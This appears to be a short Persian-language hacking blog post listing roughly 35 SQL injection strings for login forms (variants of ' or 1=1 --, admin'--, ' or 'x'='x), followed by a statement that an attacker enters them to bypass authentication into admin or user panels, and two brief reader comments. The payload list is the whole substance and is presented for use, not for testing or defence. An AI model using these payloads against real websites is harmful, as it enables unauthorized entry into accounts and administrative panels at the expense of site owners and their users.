مجموعه دستوراتی که برای تزریق به صفحات لاگین در باگ sql استفاده میشود شامل موارد زیر میشود.
or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin'or''='
admin" or "a"="
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
که نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به Bypass به پنل مدیریتی یا کاربری میکند.
منبع: Hijack.blog.ir
چرا وقتی کد رو کپی کردم یه متن به اخر کد اضافه شد؟
چجوری اینکارو کردی؟